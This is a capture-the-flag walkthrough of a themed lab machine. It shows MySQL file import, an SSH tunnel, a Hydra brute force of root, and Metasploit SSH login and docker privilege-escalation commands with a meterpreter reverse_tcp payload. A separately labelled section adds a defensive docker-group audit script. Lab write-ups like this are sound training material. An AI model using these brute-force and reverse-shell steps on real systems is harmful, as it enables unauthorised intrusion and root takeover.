Now we use the information above to find the tables available in the database.
We find the name of the table; it is called iron_throne.
Now we find a Morse code; when we decode it, it converts to /etc/mysql/flag. When we try to access it, we are told the file is not found. Earlier we found a hint stating that we don't have enough privileges, so we take a look at our privileges.
We find that we can import files into the database. So first we create a table named Flag.
Now we import the file into our table.
Now when we access it we find our 7th flag. We also get a username and password for ssh login.
Now we use these to log in through ssh.
ssh daenerystargaryen@192.168.1.133
Enumerating through the system we find two files called digger.txt and checkpoint.txt. checkpoint.txt contains a hint to log in through ssh at IP 172.25.0.2 and to use the file digger.txt for that login.
We download digger.txt to our system through ssh.
We use local tunnelling to bind it to our port 2222.
Now we use hydra to brute force the ssh login, using root as the username and digger.txt as the password list.
We find that for the username root we have the password “Dr4g0nGl4ss!”
We use this to log in through ssh; we connect to localhost, as we have set up an ssh local tunnel to connect through.
Now, enumerating through the files, we find our secret flag. We also get a username and password to log in through ssh.
We use metasploit to connect through ssh using this username and password.
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.1.133
msf auxiliary(scanner/ssh/ssh_login) > set username branstark
msf auxiliary(scanner/ssh/ssh_login) > set password Th3_Thr33_Ey3d_Raven
msf auxiliary(scanner/ssh/ssh_login) > run
After searching for some obvious possibilities to escalate privileges, such as executables with the setuid bit set or exploits for the kernel, we noticed that this server is docker based. So we use the docker privilege escalation module in metasploit.
msf > use exploit/linux/local/docker_daemon_privilege_escalation
msf exploit(linux/local/docker_daemon_privilege_escalation) > set lhost 192.168.1.116
msf exploit(linux/local/docker_daemon_privilege_escalation) > set payload linux/x86/meterpreter/reverse_tcp
msf exploit(linux/local/docker_daemon_privilege_escalation) > set session 1
msf exploit(linux/local/docker_daemon_privilege_escalation) > run
Now we get our escalated session; we check and find that we are root.
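The Metasploit module used above obtains root from any account that can talk to the Docker daemon, which usually means membership of the docker group. As an added example (not part of the original walkthrough), this shell helper audits group and passwd files for such accounts; the function names and the sample accounts are constructed for illustration.

```shell
#!/bin/sh
# Added audit example: list non-root accounts in the docker group.
# Such accounts can drive the Docker daemon and are effectively root.

# docker_group_members GROUP_FILE PASSWD_FILE
# Inputs use /etc/group and /etc/passwd format, so copies can be audited too.
docker_group_members() {
    group_file=$1
    passwd_file=$2
    # GID of the docker group; empty when the group does not exist.
    gid=$(awk -F: '$1 == "docker" { print $3; exit }' "$group_file")
    [ -n "$gid" ] || return 0
    {
        # Supplementary members: comma-separated 4th field of the group entry.
        awk -F: '$1 == "docker" {
            n = split($4, m, ",")
            for (i = 1; i <= n; i++) if (m[i] != "") print m[i]
        }' "$group_file"
        # Accounts whose primary group is docker (4th field of passwd).
        awk -F: -v gid="$gid" '$4 == gid { print $1 }' "$passwd_file"
    } | grep -v '^root$' | sort -u
}

# write_sample DIR: constructed sample data (hypothetical accounts).
write_sample() {
    cat > "$1/group" <<'EOF'
root:x:0:
sudo:x:27:bob
docker:x:999:alice,root
EOF
    cat > "$1/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
alice:x:1000:1000::/home/alice:/bin/bash
bob:x:1001:1001::/home/bob:/bin/bash
svc_build:x:1002:999::/home/svc_build:/bin/sh
EOF
}

tmp=$(mktemp -d)
write_sample "$tmp"
echo "Accounts with Docker daemon access:"
docker_group_members "$tmp/group" "$tmp/passwd"
rm -rf "$tmp"
```

On a live host, run docker_group_members /etc/group /etc/passwd and remove any account that does not need daemon access.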
Now we enumerate through the files and find a password-protected zip file called final_battle and a file that tells us how to find the password. It contains pseudocode that tells us how to create the password using the secret flags we found.
So far we have obtained 2 secret flags. Searching through the files, we find that a music file contains a secret flag. On the home page we find 2 music files; we use exiftool and find that the mp3 file contains the secret flag.
exiftool game_of_thrones.mp3
Now we write a program in python using the pseudocode as a reference.
We run the program and find the password.
We extract the archive with 7z, supplying this password.
7z e final_battle
We find that a file called flag.txt was extracted; we open the file and find our final flag.